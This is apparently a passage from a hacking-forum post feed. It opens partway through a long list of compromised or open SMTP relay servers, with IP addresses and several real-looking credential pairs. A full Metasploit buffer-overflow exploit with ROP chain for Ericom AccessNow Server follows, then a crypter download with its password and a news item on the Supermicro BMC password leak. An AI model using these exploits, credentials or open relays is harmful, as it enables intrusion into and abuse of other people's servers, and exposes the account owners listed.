- 19:14:33 195.124.8.26:25 | no auth | SSL: False | Hostname: eu026.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:59 195.124.8.60:25 | no auth | SSL: False | Hostname: na010.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:59 195.124.8.23:25 | no auth | SSL: False | Hostname: eu023.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:59 195.124.8.11:25 | no auth | SSL: False | Hostname: eu011.fra.samsungsocialhub.com | Inbox: False | Blacklist: Unknown | Time: 22.06.2014 - 19:14:59 195.124.8.14:25 | no auth | SSL: False | Hostname: eu014.fra.samsungsocialhub.com | Inbox: False | Blacklist: Not Listed | Time: 22.06.2014 - 19:15:03 195.124.8.9:25 | no auth | SSL: False | Hostname: na019.fra.samsungsocialhub.com | Inbox: False | Blacklist: Not Listed | Time: 22.06.2014 - 19:15:13 195.124.8.38:25 | no auth | SSL: False | Hostname: apac018.fra.samsungsocialhub.com | Inbox: False | Blacklist: Not Listed | Time: 22.06.2014 - 19:16:54 195.124.8.37:25 | no auth | SSL: False | Hostname: apac017.fra.samsungsocialhub.com | Inbox: False | Blacklist: Not Listed | Time: 22.06.2014 - 19:16:55 195.145.166.55:25 | no auth | SSL: False | Hostname: ms2.inpf.de | Inbox: False | Blacklist: Not Listed | Time: 22.06.2014 - 21:37:36 195.145.166.46:25 | no auth | SSL: False | Hostname: ms.inpf.de | Inbox: False | Blacklist: Not Listed | Time: 22.06.2014 - 21:37:41 195.202.36.2:25 | no auth | SSL: False | Hostname: remote.baumeister.org | Inbox: False | Blacklist: Not Listed | Time: 22.06.2014 - 23:05:09 176.9.11.61:25 | no auth | SSL: False | Hostname: static.61.11.9.176.clients.your-server.de | Inbox: False | Blacklist: Not Listed | Time: 23.06.2014 - 05:40:18 176.9.119.170:25 | no auth | SSL: False | Hostname: static.170.119.9.176.clients.your-server.de | Inbox: False | Blacklist: Not Listed | Time: 23.06.2014 - 06:42:36 212.8.209.71:25 | no auth | SSL: False | Hostname: nta02sap.lynx.de | Inbox: False | Blacklist: Not Listed | Time: 23.06.2014 - 04:29:34 212.18.28.65:25 | no auth | SSL: False | Hostname: host-212-18-28-65.customer.m-online.net | Inbox: False | Blacklist: Not Listed | Time: 23.06.2014 - 06:54:31 176.9.252.213:465 | no auth | SSL: True | Hostname: static.213.252.9.176.clients.your-server.de | Inbox: True | Blacklist: Listed | Time: 23.06.2014 - 03:13:49 195.243.87.34:25 | no auth | SSL: False | Hostname: x2007srv.tek-service.de | Inbox: True | Blacklist: Listed | Time: 23.06.2014 - 01:32:50 176.94.124.189:25 | test@g-g-g.de : test | SSL: False | Hostname: mail.g-g-g.de | Inbox: True | Blacklist: Listed | Time: 23.06.2014 - 04:54:31 Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 18:03:35 212.77.224.118:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 18:13:08 212.77.224.119:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 17:28:19 212.77.224.121:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 18:22:45 212.77.224.122:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 17:48:25 212.77.224.123:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 18:17:23 212.77.224.124:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 18:01:27 212.77.224.125:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 17:51:49 212.77.224.126:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 17:53:43 212.77.225.2:465 | no auth | SSL: True | Hostname: ns8.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 18:27:08 212.77.225.102:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 18:38:44 212.77.225.160:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 18:46:36 212.77.225.164:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 19:17:55 212.77.225.163:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 19:14:44 212.77.225.161:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 19:12:48 212.77.225.170:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 18:53:15 212.77.225.166:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 19:00:02 212.77.225.223:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 19:19:46 212.77.225.221:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 20:21:58 212.77.225.224:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 19:45:30 212.77.226.3:465 | no auth | SSL: True | Hostname: ns6.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 19:33:59 212.77.226.7:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 20:26:15 212.77.226.6:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 19:39:19 212.77.226.4:465 | no auth | SSL: True | Hostname: ns2.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 19:41:05 212.77.226.9:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 20:44:09 212.77.226.8:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 20:57:14 212.77.226.13:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 20:46:38 212.77.224.32:465 | no auth | SSL: True | Hostname: saturn.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 20:59:08 212.77.224.117:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 21:13:26 212.77.224.112:465 | no auth | SSL: True | Hostname: beta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 21:16:44 212.77.224.113:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 21:27:12 212.77.227.195:465 | no auth | SSL: True | Hostname: 227-195-ip.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 21:29:35 212.77.228.5:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 21:43:41 212.77.228.42:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 21:50:42 212.77.228.51:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: True | Blacklist: Unknown | Time: 23.06.2014 - 21:55:28 212.77.228.49:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:27 212.77.228.47:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:28 212.77.228.41:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:28 212.77.228.43:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:29 212.77.228.44:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:29 212.77.228.45:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:29 212.77.228.56:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:31 212.77.228.59:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:32 212.77.228.54:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:32 212.77.228.57:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:33 212.77.228.53:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:33 212.77.228.58:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:34 212.77.228.89:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:40 212.77.228.88:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:41 212.77.228.98:465 | no auth | SSL: True | Hostname: 98-ip.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:43 212.77.228.99:465 | no auth | SSL: True | Hostname: 99-ip.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:27:45 212.77.225.165:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:04 212.77.225.169:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:08 212.77.225.168:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:08 212.77.225.167:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:09 212.77.225.222:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:25 212.77.225.233:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:26 212.77.226.5:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:31 212.77.226.10:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:34 212.77.226.12:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:34 212.77.226.11:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:28:34 212.77.228.48:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Not Listed | Time: 23.06.2014 - 17:29:36 212.77.228.46:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:30:40 212.77.228.50:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:30:42 212.77.228.52:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:30:43 212.77.228.131:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:30:57 212.77.228.132:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:30:57 212.77.228.40:465 | no auth | SSL: True | Hostname: delta.omc.net | Inbox: False | Blacklist: Not Listed | Time: 23.06.2014 - 17:31:06 212.77.232.3:465 | no auth | SSL: True | Hostname: 3-ip.omc.net | Inbox: False | Blacklist: Unknown | Time: 23.06.2014 - 17:32:04 212.77.228.55:465 | no auth | SSL: True | Hostname: omega.omc.net | Inbox: False | Blacklist: Not Listed | Time: 23.06.2014 - 17:32:20 212.77.232.2:465 | no auth | SSL: True | Hostname: 2-ip.omc.net | Inbox: False | Blacklist: Not Listed | Time: 23.06.2014 - 17:33:30 95.90.48.101:25 | no auth | SSL: False | Hostname: 95-90-48-101-dynip.superkabel.de | Inbox: False | Blacklist: Listed | Time: 23.06.2014 - 18:09:51 176.9.206.202:587 | user@mofep.gov.gh : user | SSL: True | Hostname: br2.cyterrasolutions.com | Inbox: True | Blacklist: Listed | Time: 23.06.2014 - 20:45:25 176.9.22.85:465 | sales@gelatineelamin.com : sales | SSL: True | Hostname: static.85.22.9.176.clients.your-server.de | Inbox: True | Blacklist: Listed | Time: 23.06.2014 - 17:56:02 inbox: 176.9.113.197:25 | test@microcosmosrecords.com : test | SSL: True | Hostname: static.197.113.9.176.clients.your-server.de | Inbox: True | Blacklist: Listed | Time: 25.06.2014 - 05:49:33 176.9.142.211:465 | test@pmonly.com : 1234567 | SSL: True | Hostname: s7.webhost1.ru | Inbox: True | Blacklist: Listed | Time: 25.06.2014 - 08:09:09 217.5.204.250:465 | admin@fag-badsteben.de : admin | SSL: True | Hostname: mail.fag-badsteben.de | Inbox: True | Blacklist: Listed | Time: 25.06.2014 - 18:48:35 77.68.61.32:465 | no auth | SSL: True | Hostname: server77-68-61-32.live-servers.net | Inbox: True | Blacklist: Listed | Time: 26.06.2014 - 03:16:57 77.68.61.33:465 | no auth | SSL: True | Hostname: server77-68-61-33.live-servers.net | Inbox: True | Blacklist: Listed | Time: 26.06.2014 - 03:21:53 217.7.191.196:587 | no auth | SSL: True | Hostname: SERVER1 | Inbox: True | Blacklist: Listed | Time: 26.06.2014 - 05:33:03
  20. ANTI-HACKER TOOL KIT, Fourth Edition Author: Mike Shema Download: http://www.scribd.com/doc/231392575/Anti-Hacker-Tool-Kit-4th-Edition
  21. Exploiting bug in Supermicro hardware is as easy as connecting to port 49152. An alarming number of servers containing motherboards manufactured by Supermicro continue to expose administrator passwords despite the release of an update that patches the critical vulnerability, an advisory published Thursday warned. The threat resides in the baseboard management controller (BMC), a motherboard component that allows administrators to monitor the physical status of large fleets of servers, including their temperatures, disk and memory performance, and fan speeds. Unpatched BMCs in Supermicro motherboards contain a binary file that stores remote login passwords in clear text. Vulnerable systems can be detected by performing an Internet scan on port 49152. A recent query on the Shodan search engine indicated there are 31,964 machines still vulnerable, a number that may not include many virtual machines used in shared hosting environments. "This means at the point of this writing, there are 31,964 systems that have their passwords available on the open market," wrote Zachary Wikholm, a senior security engineer with the CARInet Security Incident Response Team. "It gets a bit scarier when you review some of the password statistics. Out of those passwords, 3,296 are the default combination. Since I'm not comfortable providing too much password information, I will just say that there exists a subset of this data that either contains or just was 'password.'" A separate blog post from security training institute Sans confirmed the contents of the advisory. "The vulnerability involves a plaintext password file available for download simply by connecting to the specific port, 49152," it stated. "One of our team has tested this vulnerability, and it works like a champ, so let’s add another log to the fire and spread the good word." Other researchers chimed in with tweets such as: Wikholm said the Supermicro patch requires vulnerable motherboards to be "flashed" with new firmware, a process that's not feasible for many production servers. An alternative workaround involves establishing a secure shell connection to a vulnerable device and disabling all universal plug and play processes. While effective, the fix lasts only until the system is disconnected from a power source, making it possible for the vulnerability to be resurrected. Thursday's advisory comes 10 months after security researchers warned that as many as 100,000 Internet-connected servers sold by Dell, HP, and other large manufacturers contained BMCs that were vulnerable to remote hack attacks that steal passwords and install malware on their host systems. Those vulnerabilities were contained in the intelligent platform management interface, a protocol implemented in various BMCs. Via
  22. Ericom AccessNow Server Buffer Overflow metasploit.com ?temp66 ?2014-06-19 ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Ericom AccessNow Server Buffer Overflow', 'Description' => %q{ This module exploits a stack based buffer overflow in Ericom AccessNow Server. The vulnerability is due to an insecure usage of vsprintf with user controlled data, which can be triggered with a malformed HTTP request. This module has been tested successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003 Server SP2. }, 'Author' => [ 'Unknown', # Vulnerability Discovery 'juan vazquez', # Metasploit Module ], 'References' => [ ['ZDI', '14-160'], ['CVE', '2014-3913'], ['BID', '67777'], ['URL','http://www.ericom.com/security-ERM-2014-610.asp'] ], 'Privileged' => true, 'Platform' => 'win', 'Arch' => ARCH_X86, 'Payload' => { 'Space' => 4096, 'BadChars' => "\x00\x0d\x0a", 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'Targets' => [ [ 'Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]', { 'RopOffset' => 62, 'Offset' => 30668, 'Ret' => 0x104da1e5 # 0x104da1e5 {pivot 1200 / 0x4b0} # ADD ESP,4B0 # RETN # From AccessNowAccelerator32.dll } ] ], 'DisclosureDate' => 'Jun 2 2014', 'DefaultTarget' => 0)) register_options([Opt::RPORT(8080)], self.class) end def check res = send_request_cgi({ 'uri' => '/AccessNow/start.html' }) unless res && res.code == 200 && res.headers['Server'] return Exploit::CheckCode::Safe end if res.headers['Server'] =~ /Ericom AccessNow Server/ return Exploit::CheckCode::Appears # Ericom AccessNow 2.4 elsif res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom Access Server/ return Exploit::CheckCode::Detected # Ericom AccessNow 3 end Exploit::CheckCode::Unknown end def exploit_uri uri = "#{rand_text_alpha(1)} " # To ensure a "malformed request" error message uri << rand_text(target['RopOffset']) uri << create_rop_chain uri << payload.encoded uri << rand_text(target['Offset'] - uri.length) uri << rand_text(4) # nseh uri << [target.ret].pack("V") # seh uri end def exploit print_status("#{peer} - Sending malformed request...") send_request_raw({ 'method' => 'GET', 'uri' => exploit_uri, 'encode' => false }, 1) end def create_rop_chain # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3 0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3 0x10518866, # POP EAX # RETN [AccessNowAccelerator32.dll] 0x105c6294, # ptr to &VirtualAlloc() [IAT AccessNowAccelerator32.dll] 0x101f292b, # MOV EAX,DWORD PTR DS:[EAX] # RETN [AccessNowAccelerator32.dll] 0x101017e6, # XCHG EAX,ESI # RETN [AccessNowAccelerator32.dll] 0x103ba89c, # POP EBP # RETN [AccessNowAccelerator32.dll] 0x103eed74, # & jmp esp [AccessNowAccelerator32.dll] 0x1055dac2, # POP EAX # RETN [AccessNowAccelerator32.dll] 0xffffffff, # Value to negate, will become 0x00000001 0x1052f511, # NEG EAX # RETN [AccessNowAccelerator32.dll] 0x10065f69, # XCHG EAX,EBX # RETN [AccessNowAccelerator32.dll] 0x10074429, # POP EAX # RETN [AccessNowAccelerator32.dll] 0xfbdbcb75, # put delta into eax (-> put 0x00001000 into edx) 0x10541810, # ADD EAX,424448B # RETN [AccessNowAccelerator32.dll] 0x1038e58a, # XCHG EAX,EDX # RETN [AccessNowAccelerator32.dll] 0x1055d604, # POP EAX # RETN [AccessNowAccelerator32.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x10528db3, # NEG EAX # RETN [AccessNowAccelerator32.dll] 0x1057555d, # XCHG EAX,ECX # RETN [AccessNowAccelerator32.dll] 0x1045fd24, # POP EDI # RETN [AccessNowAccelerator32.dll] 0x10374022, # RETN (ROP NOP) [AccessNowAccelerator32.dll] 0x101f25d4, # POP EAX # RETN [AccessNowAccelerator32.dll] 0x90909090, # nop 0x1052cfce # PUSHAD # RETN [AccessNowAccelerator32.dll] ].pack("V*") rop_gadgets end end Source
  23. PDBRipper is a utility for extract a information from PDB-files. PDPRipper can extract: Enumerations User define types(structures, unions ...) Type defines and creates header C/C++ files. Download PDBRipper ver. 1.12 (OS Windows) Source
  24. Source Crypter By Kaway [VB6] Download: http://uppit.com/2muxdvh2hlw7/sc.rar pass: estuda
  25. Learning Nessus for Penetration Testing Master how to perform IT infrastructure security vulnerability assessments using Nessus with tips and insights from real-world challenges faced during vulnerability assessment Author: Himanshu Kumar Download: http://www.scribd.com/doc/230390527/Learning-Nessus-for-Penetration-Testing
×
×
  • Create New...